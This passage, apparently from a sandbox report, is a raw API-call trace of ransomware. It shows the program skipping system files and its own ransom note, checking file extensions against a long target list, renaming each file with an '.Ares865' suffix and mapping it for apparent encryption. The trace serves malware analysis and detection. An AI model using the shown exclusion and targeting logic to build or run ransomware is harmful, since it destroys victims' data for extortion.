lstrlenW (lpString="tmd") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.985] lstrlenW (lpString="tps") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.985] lstrlenW (lpString="trc") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.985] lstrlenW (lpString="trc") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.985] lstrlenW (lpString="trm") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.985] lstrlenW (lpString="udb") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.985] lstrlenW (lpString="udl") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.985] lstrlenW (lpString="usr") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.985] lstrlenW (lpString="v12") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.985] lstrlenW (lpString="vis") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.985] lstrlenW (lpString="vpd") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.985] lstrlenW (lpString="vvv") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.985] lstrlenW (lpString="wdb") returned 3 [0092.985] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.985] lstrlenW (lpString="wmdb") returned 4 [0092.985] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.986] lstrlenW (lpString="wrk") returned 3 [0092.986] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.986] lstrlenW (lpString="xdb") returned 3 [0092.986] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.986] lstrlenW (lpString="xld") returned 3 [0092.986] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.986] lstrlenW (lpString="xmlff") returned 5 [0092.986] lstrcmpiW (lpString1="4.lnk", lpString2="xmlff") returned -1 [0092.986] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1t27EyOo90bdWGY4.lnk.Ares865") returned 65 [0092.986] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1t27EyOo90bdWGY4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1t27eyoo90bdwgy4.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1t27EyOo90bdWGY4.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1t27eyoo90bdwgy4.lnk.ares865"), dwFlags=0x1) returned 1 [0092.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1t27EyOo90bdWGY4.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\1t27eyoo90bdwgy4.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.987] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=662) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.988] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.988] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.988] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.988] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5a0, lpName=0x0) returned 0x15c [0092.989] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5a0) returned 0x190000 [0092.989] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.989] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.989] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.990] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.990] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.990] CloseHandle (hObject=0x15c) returned 1 [0092.990] CloseHandle (hObject=0x118) returned 1 [0092.991] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.991] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.991] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.991] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d8ee7c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d8ee7c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d8ee7c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x221, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2G 0.lnk", cAlternateFileName="2G0~1.LNK")) returned 1 [0092.991] lstrcmpiW (lpString1="2G 0.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.991] lstrcmpiW (lpString1="2G 0.lnk", lpString2="aoldtz.exe") returned -1 [0092.991] lstrcmpiW (lpString1="2G 0.lnk", lpString2=".") returned 1 [0092.991] lstrcmpiW (lpString1="2G 0.lnk", lpString2="..") returned 1 [0092.991] lstrcmpiW (lpString1="2G 0.lnk", lpString2="windows") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="bootmgr") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="temp") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="pagefile.sys") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="boot") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="ids.txt") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="ntuser.dat") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="perflogs") returned -1 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2="MSBuild") returned -1 [0092.992] lstrlenW (lpString="2G 0.lnk") returned 8 [0092.992] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\1t27EyOo90bdWGY4.lnk") returned 57 [0092.992] lstrcpyW (in: lpString1=0x2cce44a, lpString2="2G 0.lnk" | out: lpString1="2G 0.lnk") returned="2G 0.lnk" [0092.992] lstrlenW (lpString="2G 0.lnk") returned 8 [0092.992] lstrlenW (lpString="Ares865") returned 7 [0092.992] lstrcmpiW (lpString1="G 0.lnk", lpString2="Ares865") returned 1 [0092.992] lstrlenW (lpString=".dll") returned 4 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2=".dll") returned 1 [0092.992] lstrlenW (lpString=".lnk") returned 4 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2=".lnk") returned 1 [0092.992] lstrlenW (lpString=".ini") returned 4 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2=".ini") returned 1 [0092.992] lstrlenW (lpString=".sys") returned 4 [0092.992] lstrcmpiW (lpString1="2G 0.lnk", lpString2=".sys") returned 1 [0092.992] lstrlenW (lpString="2G 0.lnk") returned 8 [0092.992] lstrlenW (lpString="bak") returned 3 [0092.992] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.992] lstrlenW (lpString="ba_") returned 3 [0092.992] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.992] lstrlenW (lpString="dbb") returned 3 [0092.992] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.992] lstrlenW (lpString="vmdk") returned 4 [0092.992] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.992] lstrlenW (lpString="rar") returned 3 [0092.992] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.992] lstrlenW (lpString="zip") returned 3 [0092.992] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.992] lstrlenW (lpString="tgz") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.993] lstrlenW (lpString="vbox") returned 4 [0092.993] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.993] lstrlenW (lpString="vdi") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.993] lstrlenW (lpString="vhd") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.993] lstrlenW (lpString="vhdx") returned 4 [0092.993] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.993] lstrlenW (lpString="avhd") returned 4 [0092.993] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.993] lstrlenW (lpString="db") returned 2 [0092.993] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.993] lstrlenW (lpString="db2") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.993] lstrlenW (lpString="db3") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.993] lstrlenW (lpString="dbf") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.993] lstrlenW (lpString="mdf") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.993] lstrlenW (lpString="mdb") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.993] lstrlenW (lpString="sql") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.993] lstrlenW (lpString="sqlite") returned 6 [0092.993] lstrcmpiW (lpString1=" 0.lnk", lpString2="sqlite") returned -1 [0092.993] lstrlenW (lpString="sqlite3") returned 7 [0092.993] lstrcmpiW (lpString1="G 0.lnk", lpString2="sqlite3") returned -1 [0092.993] lstrlenW (lpString="sqlitedb") returned 8 [0092.993] lstrlenW (lpString="xml") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.993] lstrlenW (lpString="$er") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.993] lstrlenW (lpString="4dd") returned 3 [0092.993] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.994] lstrlenW (lpString="4dl") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.994] lstrlenW (lpString="^^^") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.994] lstrlenW (lpString="abs") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.994] lstrlenW (lpString="abx") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.994] lstrlenW (lpString="accdb") returned 5 [0092.994] lstrcmpiW (lpString1="0.lnk", lpString2="accdb") returned -1 [0092.994] lstrlenW (lpString="accdc") returned 5 [0092.994] lstrcmpiW (lpString1="0.lnk", lpString2="accdc") returned -1 [0092.994] lstrlenW (lpString="accde") returned 5 [0092.994] lstrcmpiW (lpString1="0.lnk", lpString2="accde") returned -1 [0092.994] lstrlenW (lpString="accdr") returned 5 [0092.994] lstrcmpiW (lpString1="0.lnk", lpString2="accdr") returned -1 [0092.994] lstrlenW (lpString="accdt") returned 5 [0092.994] lstrcmpiW (lpString1="0.lnk", lpString2="accdt") returned -1 [0092.994] lstrlenW (lpString="accdw") returned 5 [0092.994] lstrcmpiW (lpString1="0.lnk", lpString2="accdw") returned -1 [0092.994] lstrlenW (lpString="accft") returned 5 [0092.994] lstrcmpiW (lpString1="0.lnk", lpString2="accft") returned -1 [0092.994] lstrlenW (lpString="adb") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.994] lstrlenW (lpString="adb") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.994] lstrlenW (lpString="ade") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.994] lstrlenW (lpString="adf") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.994] lstrlenW (lpString="adn") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.994] lstrlenW (lpString="adp") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.994] lstrlenW (lpString="alf") returned 3 [0092.994] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.995] lstrlenW (lpString="ask") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.995] lstrlenW (lpString="btr") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.995] lstrlenW (lpString="cat") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.995] lstrlenW (lpString="cdb") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.995] lstrlenW (lpString="ckp") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.995] lstrlenW (lpString="cma") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.995] lstrlenW (lpString="cpd") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.995] lstrlenW (lpString="dacpac") returned 6 [0092.995] lstrcmpiW (lpString1=" 0.lnk", lpString2="dacpac") returned -1 [0092.995] lstrlenW (lpString="dad") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.995] lstrlenW (lpString="dadiagrams") returned 10 [0092.995] lstrlenW (lpString="daschema") returned 8 [0092.995] lstrlenW (lpString="db-journal") returned 10 [0092.995] lstrlenW (lpString="db-shm") returned 6 [0092.995] lstrcmpiW (lpString1=" 0.lnk", lpString2="db-shm") returned -1 [0092.995] lstrlenW (lpString="db-wal") returned 6 [0092.995] lstrcmpiW (lpString1=" 0.lnk", lpString2="db-wal") returned -1 [0092.995] lstrlenW (lpString="dbc") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.995] lstrlenW (lpString="dbs") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.995] lstrlenW (lpString="dbt") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.995] lstrlenW (lpString="dbv") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.995] lstrlenW (lpString="dbx") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.995] lstrlenW (lpString="dcb") returned 3 [0092.995] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.996] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.996] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.996] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.996] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.996] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2G 0.lnk.Ares865") returned 53 [0092.996] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2G 0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\2g 0.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2G 0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\2g 0.lnk.ares865"), dwFlags=0x1) returned 1 [0092.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2G 0.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\2g 0.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.998] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=545) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.998] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.998] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.998] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.999] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.999] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.999] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x15c [0093.000] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0093.000] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.001] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.001] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.001] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.001] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.001] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.001] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.001] CloseHandle (hObject=0x15c) returned 1 [0093.002] CloseHandle (hObject=0x118) returned 1 [0093.003] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.003] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.003] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.003] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d0276a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d0276a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d0276a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x19ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2Qrv6OWl.lnk", cAlternateFileName="")) returned 1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="aoldtz.exe") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2=".") returned 1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="..") returned 1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="windows") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="bootmgr") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="temp") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="pagefile.sys") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="boot") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="ids.txt") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="ntuser.dat") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="perflogs") returned -1 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2="MSBuild") returned -1 [0093.003] lstrlenW (lpString="2Qrv6OWl.lnk") returned 12 [0093.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2G 0.lnk") returned 45 [0093.003] lstrcpyW (in: lpString1=0x2cce44a, lpString2="2Qrv6OWl.lnk" | out: lpString1="2Qrv6OWl.lnk") returned="2Qrv6OWl.lnk" [0093.003] lstrlenW (lpString="2Qrv6OWl.lnk") returned 12 [0093.003] lstrlenW (lpString="Ares865") returned 7 [0093.003] lstrcmpiW (lpString1="OWl.lnk", lpString2="Ares865") returned 1 [0093.003] lstrlenW (lpString=".dll") returned 4 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2=".dll") returned 1 [0093.003] lstrlenW (lpString=".lnk") returned 4 [0093.003] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2=".lnk") returned 1 [0093.003] lstrlenW (lpString=".ini") returned 4 [0093.004] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2=".ini") returned 1 [0093.004] lstrlenW (lpString=".sys") returned 4 [0093.004] lstrcmpiW (lpString1="2Qrv6OWl.lnk", lpString2=".sys") returned 1 [0093.004] lstrlenW (lpString="2Qrv6OWl.lnk") returned 12 [0093.004] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2Qrv6OWl.lnk.Ares865") returned 57 [0093.004] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2Qrv6OWl.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\2qrv6owl.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2Qrv6OWl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\2qrv6owl.lnk.ares865"), dwFlags=0x1) returned 1 [0093.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2Qrv6OWl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\2qrv6owl.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.005] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6655) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.005] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.005] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.006] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.006] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.006] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d00, lpName=0x0) returned 0x15c [0093.007] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d00) returned 0x190000 [0093.007] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.008] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.008] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0093.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.008] HeapFree (in: hHeap=0x2b0000, 